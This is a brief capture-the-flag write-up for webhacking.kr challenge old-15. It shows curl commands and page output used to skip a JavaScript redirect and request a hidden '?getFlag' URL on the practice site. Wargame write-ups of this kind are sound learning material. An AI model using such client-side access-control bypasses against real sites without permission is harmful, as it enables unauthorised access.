old-15 -- JavaScript (Autoredirect)

URL: https://webhacking.kr/challenge/js-2/

Seems like JavaScript is restricting access, we could disable JS in browser or just curl:

➜ curl 'https://webhacking.kr/challenge/js-2/' -b 'PHPSESSID=3052403292'
<html>
<head>
<title>Challenge 15</title>
</head>
<body>
<script>
  alert("Access_Denied");
  location.href='/';
  document.write("<a href=?getFlag>[Get Flag]</a>");
</script>
</body>

Add ?getFlag and pwned.

➜ curl 'https://webhacking.kr/challenge/js-2/?getFlag' -b 'PHPSESSID=3052403292'
<script>alert('old-15 Pwned!');</script><hr>old-15 Pwned. You got 5point. Congratz!<hr><html>
<head>
<title>Challenge 15</title>
</head>
<body>
<script>
  alert("Access_Denied");
  location.href='/';
  document.write("<a href=?getFlag>[Get Flag]</a>");
</script>
</body>

Previousold-14 -- JavaScript (Auth)Nextold-16 -- JavaScript (Event)

Last updated 7 months ago